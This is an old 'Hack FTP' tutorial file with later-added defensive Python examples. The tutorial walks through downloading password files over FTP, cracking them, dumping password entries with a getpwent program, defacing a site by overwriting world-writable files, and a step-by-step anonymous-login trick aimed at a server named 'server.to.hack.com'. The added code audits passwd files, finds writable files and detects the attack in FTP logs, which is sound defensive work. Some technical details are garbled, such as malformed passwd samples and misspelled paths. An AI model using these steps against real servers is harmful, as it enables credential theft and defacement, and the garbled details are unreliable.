Hack FTP

Note: First of all, this was not written by us. I don't know who did. If you wrote it, please contact me and I will gladly give you full credit for it.


Intro - FTP (File Transfer Protocol) is used by almost every commercial web hosting company 
because it allows its users to update their sites. It sends logins and passwords in clear 
text (unencrypted), so anything that can observe them, such as a keystroke logger, can 
grab usernames and passwords. 

Legal-
A. Disclaimer - I am *NOT* responsible for what you do with the information in this text 
file. This is for educational purposes only.
B. You may distribute this freely as long as it is kept intact and credit is given 
to encrypt0.

Begin

Technique #1

An example of an encrypted password file is:

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

The entry marked Superuser is the root account, the one that gives you root. That's the main part of the file.

Below is a shadowed password file:

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

Shadowed password files don't let you view or copy the actual encrypted password. This 
causes problems for the password cracker and dictionary maker. Below is another example 
of a shadowed password file:


root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Shadowed password files have an "x" or "*" in place of the password.
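The audit below is an added example and is not code from the original text. It reads passwd-format lines and reports the entries an administrator would want to fix: accounts whose hash sits in the world-readable passwd file instead of behind an "x" or "*", accounts with an empty password field, extra uid 0 accounts, and malformed lines. The sample lines are constructed in the format of the files shown above.

```python
"""Audit passwd(5)-format lines for accounts that need attention.
Added example, not code from the original text.  The sample below is constructed."""

# Constructed sample: shadowed, locked, hash-exposed, passwordless, uid-0 alias
# and one broken line.
SAMPLE_PASSWD = """\
root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
guest::1130:20:Guest account:/usr/people/guest:/bin/csh
toor:*:0:0:root alias:/:/bin/sh
badline:x:abc
"""


def classify_password_field(field):
    """Map the second passwd field to what it means for anyone who can read the file.

    'x'                 -> shadowed (the real hash lives in the shadow file)
    '*' or leading '!'  -> locked, no valid password
    ''                  -> empty password field
    anything else       -> an actual hash is exposed in this world-readable file
    """
    if field == "":
        return "empty"
    if field == "x":
        return "shadowed"
    if field == "*" or field.startswith("!"):
        return "locked"
    return "hash"


def audit_passwd(text):
    """Return a list of (user, uid, finding) tuples, in file order.

    Findings: 'hash-exposed', 'no-password', 'uid0-alias', 'malformed'.
    Shadowed and locked accounts produce no finding.
    """
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], None, "malformed"))
            continue
        name, password, uid, _gid, _gecos, _home, _shell = fields
        try:
            uid = int(uid)
        except ValueError:
            findings.append((name, None, "malformed"))
            continue
        kind = classify_password_field(password)
        if kind == "hash":
            findings.append((name, uid, "hash-exposed"))
        elif kind == "empty":
            findings.append((name, uid, "no-password"))
        # A second uid 0 account is a classic sign of a backdoor or a sloppy setup.
        if uid == 0 and name != "root":
            findings.append((name, uid, "uid0-alias"))
    return findings


def is_fully_shadowed(text):
    """True when no well-formed entry exposes a hash or an empty password."""
    return not any(f[2] in ("hash-exposed", "no-password") for f in audit_passwd(text))


if __name__ == "__main__":
    for user, uid, finding in audit_passwd(SAMPLE_PASSWD):
        print(f"{finding:13} {user} (uid {uid})")
```

Run it against a copy of a real passwd file by passing the file contents to audit_passwd; an empty result together with is_fully_shadowed returning True means the file gives a reader nothing to feed a cracker.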

Now that we can get and identify the password file, let's work on cracking it.
The first step that you would take is to download or copy the file. The second step is 
to find a password cracker and a dictionary maker. Although it's nearly impossible to 
find a good cracker, there are a few OK ones out there. I recommend that you look for 
Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a 
dictionary maker or a dictionary file... When you start a cracking program you will be 
asked for the password file and a dictionary (word list). That's where a dictionary 
maker comes in. You can download one from nearly every hacker page on the net. A 
dictionary maker generates all the possible letter combinations from the alphabet that 
you choose (ASCII, caps, lowercase, and numeric characters may also be added). 

On many but not all systems the following program prints the password database through 
getpwent(3), which on some systems returns the encrypted passwords even when the 
password file is shadowed.

---(snip)---

#include <stdio.h>
#include <pwd.h>

/* Walk the password database with getpwent(3) and print each entry in
   passwd(5) format.  Where shadow passwords are in use, pw_passwd is only
   the placeholder ("x" or "*") unless the system hands the real hash to a
   sufficiently privileged caller, which is why this works on "many but not
   all" systems.  The "=3D" in the original listing was a quoted-printable
   artifact for "=". */
int main(void)
{
    struct passwd *p;

    while ((p = getpwent()) != NULL)
        printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name,
               p->pw_passwd,
               (int)p->pw_uid, (int)p->pw_gid, p->pw_gecos, p->pw_dir,
               p->pw_shell);
    endpwent();
    return 0;
}

---(snip)---

Another and probably easier way is to find the backup of the shadowed password file:

Unix                   Path                                                  Token
AIX 3                  /etc/security/passwd                                  !
                       or /tcb/auth/files/<first letter of username>/<username>   #
A/UX 3.0s              /tcb/files/auth/?/                                    *
BSD4.3-Reno            /etc/master.passwd                                    *
ConvexOS 10            /etc/shadqw                                           *
ConvexOS 11            /etc/shadow                                           *
DG/UX                  /etc/tcb/aa/user                                      *
EP/IX                  /etc/shadow                                           X
HP-UX                  /.secure/etc/passwd                                   *
IRIX 5                 /etc/shadow                                           X
Linux 1.1              /etc/shadow                                           *
OSF/1                  /etc/passwd[.dir|.pag]                                *
SCO Unix #.2.x         /tcb/auth/files/<first letter of username>/<username> *
SunOS4.1c+32           /etc/security/passwd/adjunct                          =
SunOS 5.0              /etc/shadow (optional NIS+ private secure maps/tables/whatever)
System V Release 4.0   /etc/shadow                                           X
System V Release 4.2   /etc/security/* database
Ultrix 4               /etc/auth[.dir|.pag]                                  *
UNICOS                 /etc/udb


Now we will move on to the next technique of hacking through FTP, which involves 
downloading and uploading.

Technique #2

C:\ftp 127.0.0.1
Connected to 127.0.0.1.
220 Fake FTP server ready.
User (127.0.0.1:(none)): guest
331 Password required for guest.
Password:
230 User logged in.
ftp> pwd
257 "/usr/people/guest" is a current directory.
ftp> cd /
250 CWD command successful.
ftp> pwd
257 "/" is a current directory.
ftp> get /etc/shadow
200 PORT command successful.
550 /etc/shadow: No such file or directory.
ftp> get /etc/passwd
200 PORT command successful
ftp> get /etc/passwd
200 PORT command successful.
150 Opening ASCII mode data connection for '/etc/passwd' (1145 bytes).
226 Transfer complete
ftp: 1166 bytes recieved in 0.00Seconds 1166000.00Kbytes/sec.

Notice how the password file was not shadowed. So /etc/passwd had the encrypted 
passwords in it, which can easily be run through Crack. Let's continue our FTP session.

ftp> cd /var/www/htdocs
250 CWD command successful

We now give the "ls -al" command at the webserver document root and get:

drwxrwxrwx 7 root sys 4096 Sep 9 14:38 ./ 
drwxr-xr-x 6 root sys 68 Oct 22 1998 ../
lrwxr-xr-x 1 root sys 29 Oct 22 1998 SoftWindows2 -> ../../../usr/lib/SoftWindows2/
drwxr-xr-x 14 root sys 4096 Oct 22 1998 WhatsNew/ 
lrwxr-xr-x 1 guest user 31 Sep 9 14:38 guest -> /usr/people/bob/public_html/
-rw-rw-rw- 1 root sys 2085 Oct 22 1998 default.gif
lrwxr-xr-x 1 demos demos 22 Nov 16 1998 demos -> /usr/demos/public_html/
drwxr-xr-x 2 root sys 9 Oct 22 1998 dist/
lrwxr-xr-x 1 guest guest 29 Nov 16 1998 guest -> /usr/people/guest/puclic_html/
drwxr-xr-x 2 root sys 4096 Oct 22 1998 icons/
drwxr-xr-x 2 root sys 125 Oct 22 1998 images/
-rw-r--r-- 1 root sys 754 Oct 22 1998 index.html
-rw-rw-rw- 1 root sys 765 Sep 9 14:38 userList.html
drwxr-xr-x 3 root sys 4096 Oct 22 1998 webdist/
-r--r--r-- 1 root sys 3760 Oct 22 1998 webdist.html
226 Transfer complete.
ftp: 1110 bytes recieved in 0.11Seconds 10.09 Kbytes/sec

Look at that, some world writable files (you can tell by the letter w in the second 
to last place in the permission string that begins each line). Index.html isn't writable, 
but look at default.gif. By clicking on various images I find out that default.gif 
is the icon for the guest account. I download default.gif and play with it, then 
upload the new version.
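As an added example (not code from the original text), here is the check an administrator would run over the same kind of listing to find what the text found by eye: every entry whose "other" write bit is set. Symlinks are reported separately, because the mode shown on an `l` line is the link's own and says nothing about the permissions of the target, which is the surprise the text runs into with ~guest below. The listing is constructed in the format of the one above.

```python
"""Find world-writable entries in an `ls -l` style listing of a web document root.
Added example, not code from the original text; the listing is constructed."""
import re

SAMPLE_LISTING = """\
drwxrwxrwx 7 root sys 4096 Sep 9 14:38 ./
drwxr-xr-x 6 root sys 68 Oct 22 1998 ../
lrwxr-xr-x 1 guest user 31 Sep 9 14:38 guest -> /usr/people/bob/public_html/
-rw-rw-rw- 1 root sys 2085 Oct 22 1998 default.gif
-rw-r--r-- 1 root sys 754 Oct 22 1998 index.html
-rw-rw-rw- 1 root sys 765 Sep 9 14:38 userList.html
-r--r--r-- 1 root sys 3760 Oct 22 1998 webdist.html
226 Transfer complete.
"""

# mode, link count, owner, group, size, month, day, time-or-year, name [-> target]
LS_LINE = re.compile(
    r"^(?P<mode>[-dlbcps][-rwxsStT]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+\d+\s+"
    r"\S+\s+\d+\s+\S+\s+(?P<name>.+?)(?: -> (?P<target>.+))?$"
)


def parse_ls_line(line):
    """Return a dict with mode/owner/group/name/target, or None for non-entry lines
    (FTP status replies, blank lines, 'total N' headers)."""
    m = LS_LINE.match(line.rstrip())
    if not m:
        return None
    entry = m.groupdict()
    entry["name"] = entry["name"].rstrip("/") or "/"
    return entry


def is_world_writable(mode):
    """The 'other' write bit is the 9th character (index 8) of the 10-character
    mode string, i.e. the second to last place the text refers to."""
    return mode[8] == "w"


def find_world_writable(listing):
    """Classify entries: files and directories with the other-write bit set, plus
    symlinks, whose listed mode must not be trusted for the target."""
    result = {"files": [], "dirs": [], "symlinks": []}
    for line in listing.splitlines():
        entry = parse_ls_line(line)
        if entry is None:
            continue
        mode = entry["mode"]
        if mode[0] == "l":
            result["symlinks"].append(entry["name"])
        elif is_world_writable(mode):
            result["dirs" if mode[0] == "d" else "files"].append(entry["name"])
    return result


if __name__ == "__main__":
    for kind, names in find_world_writable(SAMPLE_LISTING).items():
        print(f"{kind}: {', '.join(names) or '-'}")
```

A world-writable document root directory (the "./" entry here) matters as much as the writable files: it lets anyone with FTP access create new files there, not just overwrite the listed ones.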

So here we upload the hacked gif to the site via FTP:

ftp> put default.gif
200 PORT command successful.
150 Opening ASCII mode data connection for 'default.gif'.
226 Transfer complete.
ftp: 1450 bytes sent in 0.00Seconds 1450000.00Kbytes/sec.

I determine that I successfully uploaded my hacked image. However, it didn't have 
the desired effect. Index.html is not modified. Clicking on the view image I 
discover it is in ~guest - and it isn't world writable. 

So now we try hacking another world writable file. 

ftp> get userList.html 
200 PORT command successful.
150 Opening ASCII mode data connection for 'userList.html' (765 bytes).
226 Transfer complete.
ftp: 814 bytes recieved in 0.00Seconds 814000.00Kbytes/sec.

I edit it just very slightly to point it to the image file I just defaced and put 
it back. We now have a hack. 

Technique #3

The following can be done from a shell or DOS prompt.

Step 1. Go to the Run prompt.
Step 2. Type "command" to get a DOS command prompt.
Step 3. Type "ftp server.to.hack.com".
Step 4. When prompted to log in, just hit Enter without typing anything.
Step 5. When prompted for a password, just hit Enter without typing anything.
Step 6. Type "quote user ftp" and hit Enter.
Step 7. Type "quote cwd ~root" and hit Enter.
Step 8. Type "quote pass ftp" and hit Enter.

You now have guest access and can download the password file.

Step 9. Type "cd etc" and hit Enter to go to the etc directory, which contains the 
password file.
Step 10. Type "get passwd" and hit Enter; this downloads the password file to 
your hard drive.
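From the defender's side, the sequence in steps 6 to 10 leaves a recognisable trace in an FTP server's command log. The detection below is an added example, not code from the original text; its log format ("<time> <client-ip> <session-id> <command> [<argument>]") is constructed for the example, since real servers log in their own formats. It raises an alert for any CWD issued before PASS, for an anonymous session (USER ftp or anonymous) changing into ~root or etc, and for any user retrieving the password database, which also covers the guest session of technique #2.

```python
"""Detect the anonymous-FTP pattern from technique #3 in a command log.
Added example, not code from the original text.  The log format is constructed:
"<time> <client-ip> <session-id> <command> [<argument>]"."""
import re
from collections import defaultdict

SAMPLE_LOG = """\
12:00:01 198.51.100.7 s1 USER ftp
12:00:01 198.51.100.7 s1 CWD ~root
12:00:02 198.51.100.7 s1 PASS ftp
12:00:05 198.51.100.7 s1 CWD etc
12:00:06 198.51.100.7 s1 RETR passwd
12:01:10 203.0.113.9 s2 USER bob
12:01:11 203.0.113.9 s2 PASS ********
12:01:15 203.0.113.9 s2 CWD /var/www/htdocs
12:01:20 203.0.113.9 s2 STOR default.gif
12:02:00 192.0.2.4 s3 USER anonymous
12:02:00 192.0.2.4 s3 PASS guest@
12:02:03 192.0.2.4 s3 RETR README
"""

ANONYMOUS_USERS = {"ftp", "anonymous"}
# The password database, and the directories the text walks through to reach it.
SENSITIVE_PATH = re.compile(r"(^|/)(passwd|shadow|master\.passwd)$|~root|(^|/)etc(/|$)")


def parse_log(text):
    """Group log lines by session id; each event is (time, ip, command, argument)."""
    sessions = defaultdict(list)
    for line in text.splitlines():
        parts = line.split(maxsplit=4)
        if len(parts) < 4:
            continue  # blank or truncated line
        time, ip, sid, cmd = parts[:4]
        arg = parts[4] if len(parts) == 5 else ""
        sessions[sid].append((time, ip, cmd.upper(), arg))
    return sessions


def detect_suspicious_sessions(text):
    """Return (session, ip, reason) alerts, one per offending command, in log order.

    Rules:
      * any CWD issued before PASS (a server should not honour commands pre-auth)
      * any RETR of the password database, whoever the user is
      * an anonymous session issuing CWD into ~root or an etc directory
    """
    alerts = []
    for sid, events in parse_log(text).items():
        ip = events[0][1]
        user = next((arg for _, _, cmd, arg in events if cmd == "USER"), "")
        anonymous = user.lower() in ANONYMOUS_USERS
        who = "anonymous" if anonymous else user
        authenticated = False
        for _time, _ip, cmd, arg in events:
            if cmd == "PASS":
                authenticated = True
            elif cmd == "CWD" and not authenticated:
                alerts.append((sid, ip, f"CWD before PASS: {arg}"))
            elif cmd == "RETR" and SENSITIVE_PATH.search(arg):
                alerts.append((sid, ip, f"{who} RETR {arg}"))
            elif cmd == "CWD" and anonymous and SENSITIVE_PATH.search(arg):
                alerts.append((sid, ip, f"anonymous CWD {arg}"))
    return alerts


if __name__ == "__main__":
    for sid, ip, reason in detect_suspicious_sessions(SAMPLE_LOG):
        print(f"{sid} {ip}: {reason}")
```

Session s3 in the sample is a normal anonymous download and produces nothing, so the rules key on what is fetched and when, not on anonymous access as such.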

You now have the password file; open c:\passwd with Notepad. If it is encrypted, 
crack it; if not, figure out some logins by guessing. When guessing, it works well to 
finger the address and then use the information you get there to guess a password. 
Just use what you learned from technique #1 about cracking the shadowed and encrypted 
password files.
